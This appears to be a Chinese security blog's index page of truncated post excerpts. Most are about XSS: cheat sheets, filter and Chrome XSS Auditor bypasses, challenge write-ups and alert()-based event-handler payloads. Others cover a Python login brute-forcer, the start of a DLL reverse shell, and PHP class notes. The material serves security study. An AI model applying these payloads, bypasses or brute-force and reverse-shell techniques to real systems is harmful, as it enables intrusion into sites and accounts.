密码保护:XSS Cheat Sheet

密码保护:XSS Cheat Sheet
本文有一个重点需要GET到。 Technique Vector/Payload * * In URLs: & => %26 ,  # => %23 ,  + => %2B HTML Context Tag Injection <svg onload=alert(1...

密码保护:bypass的xss filter

密码保护:bypass的xss filter
原文链接:http://zone.wooyun.org/content/6899 不过个人很喜欢收集xss payload.在这里把自己平时挖xss时会用到的payloads列出来和大家一起分享。很希望大家能把自己的一些payload也分享出来。(由于我是linux党,所以本文出现在的所有payload只在firefox和chrome之下进行过测试。IE不在本文的讨论范围之内。本文只以直接输出在HTML的情况为中心进行探讨。)有错误的地方还...

密码保护:浏览器安全 之 Chrome XSS Auditor bypass

密码保护:浏览器安全 之 Chrome XSS Auditor bypass
因大神不让转载,我这只能是偷摸转载,然后隐藏了。虽然我标注了转载地址,作者名字,但是毕竟人家说不让转载了,不加密不好。。。。 (2017-05-06 更新,chrome57更新了xss auditor的拦截方式,大量payload不能用了) (2017-05-06 更新,chrome57更新了xss auditor的拦截方式,大量payload不能用了) Bypass 4 (需交互的bypass) 直到chrome 57可用。 ?c=<svg><...

PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式(单态模式)/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结

PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式(单态模式)/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结
PHP中的抽象类与抽象方法 1、什么是抽象方法? 没有方法体 {} 的方法,必须使用abstract 关键字修饰。这样的方,我们叫做抽象方法。 abstract function say(); // 抽象方法 2、什么是抽象类? 包含抽象方法的类就叫抽象类。抽象类必须使用abstract关键字修饰。 abstract class Person{} 3、抽象类的注意事项 ① 抽象类可以包...

密码保护:某XSS挑战赛分析文章

密码保护:某XSS挑战赛分析文章
隐藏文章最好的办法:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters,在其...

XSS挑战第一期Writeup

XSS挑战第一期Writeup
0x00 起因 这期 XSS 挑战的起因是在阅读“Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters”过后,在其中发现了一个很有趣的话题。那就是在圆括号被过滤的情况下,如何去执行javascript。在文中笔者给出来了这样的解决方 案: 1 <a onmouseover="javascript:window.onerror=alert;throw 1>   这是一个通过抛出异常的方...

32个触发事件XSS语句的总结

32个触发事件XSS语句的总结
作者为monyer 1、onmouseenter:当鼠标进入选区执行代码 <div style="background-color:red" onmouseenter="alert(bem)">123456</div> 2、onmouseleave:当鼠标离开选区执行代码 <DIV onmouseleave="alert(bem)" style="BACKGROUND-COLOR: red">123456</DIV> 3、onmousewheel:当鼠标在选区滚轮时执行代码 <DIV onmousewheel="alert(bem)" style...

一个有趣的 XSS 漏洞 1

一个有趣的 XSS 漏洞 1
说实话能找到这篇文字也是巧合,曾经的大牛:Mramydnei,现在已不知何处,曾经的法克论坛,现在已经烟消云散。 文章作者:Mramydnei 来源:法克论坛 (已关闭,别闹,博主我曾经还是核心元老呢) 本博主自认为,我博客应该是网上保存的最完整的带来源带图带作者的博客文章了。 最近认识了个新基友,天天找我搞 XSS,搞了三天,感觉这一套程序还是很...

python 暴力破解某http登陆接口

python 暴力破解某http登陆接口
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 # -*- coding: utf-8 -*- # 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之...

dll 反弹代码

dll 反弹代码
作者:lostwolf 地址:https://www.t00ls.net/thread-39410-1-1.html // dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "stdafx.h" #include #include #pragma comment(lib,"ws2_32") void reverse_shell(); WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; BOOL WINAPI D...